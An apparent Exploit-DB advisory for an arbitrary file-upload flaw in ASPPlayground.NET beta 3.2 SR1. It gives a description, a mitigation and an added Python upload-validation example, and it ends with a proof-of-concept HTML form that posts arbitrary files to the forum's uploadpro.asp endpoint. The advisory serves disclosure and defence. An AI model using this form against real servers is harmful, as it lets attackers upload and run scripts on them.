Vendor: ASPPlayground.NET
By: Team-Evil
CVSS: 7.5 (HIGH)
Remote Arbitrary File-Upload Vulnerability
CWE: 434
Product Name: ASPPlayground.NET
Affected Version From: beta 3.2 SR1
Affected Version To: beta 3.2 SR1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

ASP Playground Version beta 3.2 SR1 upload Arbitrary Files

ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability. Exploiting this issue may allow remote attackers to upload arbitrary files, including malicious scripts, and possibly execute the scripts on the affected server. This issue can ultimately help attackers gain unauthorized access in the context of the webserver.

Mitigation:

Ensure that the application is configured to only allow the upload of files with the appropriate MIME type and that the application validates the contents of the uploaded file.
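
The checks named in the mitigation above, as an added example that is not part of the original advisory or of ASPPlayground.NET's code. It is written in Python rather than ASP to show the logic only; the allowlist, the size limit and the function name `validate_upload` are assumptions.

```python
import os
import secrets

# Constructed allowlist: extension -> (expected MIME type, leading magic bytes).
ALLOWED = {
    ".png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    ".jpg": ("image/jpeg", b"\xff\xd8\xff"),
    ".gif": ("image/gif", b"GIF8"),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed size limit for forum attachments


def validate_upload(filename, declared_mime, data):
    """Return (True, stored_name) if the upload passes every check,
    otherwise (False, reason). The client file name is never reused."""
    # Drop any client-supplied directory part (both separator styles).
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not base or "\x00" in base:
        return False, "bad file name"
    # Only the final extension counts, compared case-insensitively.
    ext = os.path.splitext(base.lower())[1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    expected_mime, magic = ALLOWED[ext]
    # The Content-Type header is client-controlled: it must agree with the
    # extension, but it is never sufficient on its own.
    if declared_mime.lower() != expected_mime:
        return False, "MIME type does not match extension"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    # Content check: the bytes must start with the format's signature.
    if not data.startswith(magic):
        return False, "content does not match declared type"
    # Server-generated name; store it in a directory where the web server
    # does not execute scripts.
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample uploads.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    samples = [
        ("photo.PNG", "image/png", png),
        ("page.asp", "image/png", png),
        ("pic.jpg", "image/jpeg", b"plain text, not an image"),
    ]
    for name, mime, body in samples:
        print(name, validate_upload(name, mime, body))
```

A signature check only confirms how the file starts, so the storage location and the generated file name carry as much of the protection as the content check does.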
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14070/info

ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability.

Exploiting this issue may allow remote attackers to upload arbitrary files, including malicious scripts, and possibly execute the scripts on the affected server.

This issue can ultimately help attackers gain unauthorized access in the context of the webserver. 

http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=

refer to

http://www.example.com/forum/post.asp

*

ASP Playground html bug :
___________________________

<html>
<head>
<title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files
</title>

</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">

<form method="POST" action="http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=" enctype="multipart/form-data" onSubmit="return respondToUploader(this)">
<tr>
<td bgcolor="8d5a18">
<table width="100%" border="0" cellspacing="1" cellpadding="4">
<tr>
<td bgcolor="f8fff3">
upload<br>
<input type="file" name="File1" size="22">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<hr size="1" noshade>
</td>
</tr>
<tr>
<td align="right">
<input type="submit" name="submit" value="upload">

</td>
</tr>
</form>

</table>
</body>
<center><b>pOWERED By Team-Evil l8oo8l@gmail.com
</html>